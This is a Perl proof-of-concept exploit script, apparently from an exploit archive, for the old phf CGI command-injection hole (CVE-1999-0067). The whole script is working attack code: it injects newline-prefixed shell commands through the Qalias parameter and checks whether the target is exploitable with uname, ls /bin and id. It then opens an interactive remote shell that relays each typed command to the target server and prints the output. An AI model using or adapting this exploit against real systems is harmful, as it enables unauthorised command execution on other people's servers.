Perl script that exploits the very, very, very old (1996, CVE-1999-0067) phf CGI command-injection vulnerability.
019371e115ef1e5f7c22f50f06a0b178a7b66d03de1c24b4361814c83f8f415f
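#!/usr/bin/perl
#
# PHF00z3 -- proof-of-concept for the 1996-era "phf" CGI command injection
# (CVE-1999-0067).  phf, the phone-book lookup CGI shipped with NCSA httpd
# and early Apache, handed its query fields to a shell; its metacharacter
# filter (escape_shell_cmd) did not strip newline, so "%0A<command>" in the
# Qalias field runs <command> as the web-server user.
#
# Usage:  ./phf00z3.pl hostname
#   Probes http://hostname/cgi-bin/phf with uname / sh --version / ls, then
#   gives an interactive prompt that relays each typed line through the
#   injection and prints what the server echoes back.
#   Only run this against hosts you are authorised to test.
#
# greets to josh arielle matt carley
use strict;
use warnings;
use WWW::Mechanize;

# Flush STDOUT immediately so the prompt (printed without a newline) is
# visible even when output is piped.
$| = 1;

if (@ARGV < 1) {
    print "\n --=== PHF00z3 by Oxagast ===--\n\n";
    print " useage: ./$0 hostname\n\n";
    print " Play Nice :)\n";
    exit();
}

my $host = $ARGV[0];

# autocheck => 0: a failed request must not die mid-session; phf_run()
# checks $mech->success instead.
my $scrape = WWW::Mechanize->new(timeout => 3, autocheck => 0);

# Relay one shell command through the phf injection and return the lines the
# server echoed inside its <PRE> block: everything after the first "<PRE>"
# line up to, but excluding, the final line of the page (the closing tag),
# mirroring how the page was parsed before.
# Returns an empty list when the request fails or no <PRE> block is found;
# the caller can inspect $mech->success to tell the two cases apart.
sub phf_run {
    my ($mech, $target, $cmd) = @_;

    # Percent-encode the command so shell metacharacters that are also URL
    # metacharacters ('&', '#', '+', '%', ';' ...) reach phf intact instead
    # of being split off or decoded by the URL parser / server.  Previously
    # the typed line was interpolated raw into the query string.
    (my $encoded = $cmd) =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord $1)/ge;

    $mech->get("http://$target/cgi-bin/phf?Qalias=%0A$encoded");
    return () unless $mech->success;

    my @page = split /\n/, $mech->content;
    my $start;
    for my $i (0 .. $#page) {
        if ($page[$i] =~ /<PRE>/) {
            $start = $i + 1;
            last;
        }
    }
    return () unless defined $start;

    my @out = @page[$start .. $#page - 1];
    # The target controls this text and it goes straight to the terminal, so
    # drop C0 control bytes (except TAB) and DEL to block escape-sequence
    # injection by a hostile or honeypot host.  Bytes >= 0x80 are untouched.
    tr/\x00-\x08\x0B-\x1F\x7F//d for @out;
    return @out;
}

print "Connecting...\n";
print "Checking if exploitable...\n";

my @uname_out = phf_run($scrape, $host, 'uname -a');
if (!$scrape->success) {
    print "Request to http://$host/cgi-bin/phf failed: ",
          $scrape->response->status_line, "\n";
    exit 1;
}
# First echoed line of "uname -a"; shown once the shell is confirmed.
my $realunamea = defined $uname_out[0] ? $uname_out[0] : '';

# "sh --version" only yields a version line on bash; other /bin/sh
# implementations print nothing usable, in which case the prompt simply has
# no version prefix.  Test the match itself rather than a stale $1.
my $realshver = '';
my ($sh_line) = phf_run($scrape, $host, 'sh --version');
if (defined $sh_line && $sh_line =~ /version (\d+\.\d)/) {
    $realshver = "sh-$1";
}

# Exploitability heuristic: the injected "ls /bin" must have echoed a few
# binaries present on practically every Unix.
my $bin_listing = join "\n", phf_run($scrape, $host, 'ls /bin');

if ($bin_listing =~ /chmod/ && $bin_listing =~ /mkdir/ && $bin_listing =~ /stty/) {
    # First command is always "id" so we know which user the shell runs as.
    my @id_out = phf_run($scrape, $host, 'id');
    my $rootus = (grep { /\(root\)/ } @id_out) ? 1 : 0;
    if ($rootus) {
        print "OOooooo now look what we have here... :P r00t\n";
    }
    else {
        print "We got ourselves a shell... :)\n";
    }
    print "$realunamea\n";
    print "$_\n" for @id_out;

    # Interactive loop: one request per typed line.  EOF (Ctrl-D) ends the
    # session; previously <STDIN> returning undef made this spin forever.
    while (1) {
        print $realshver . ($rootus ? '# ' : '$ ');
        my $cmd = <STDIN>;
        last unless defined $cmd;
        chomp $cmd;
        next if $cmd eq '';    # nothing to run; don't waste a request
        print "$_\n" for phf_run($scrape, $host, $cmd);
    }
}
else {
    print "OOps, doesn't look like she's vulnerable. :(\n";
}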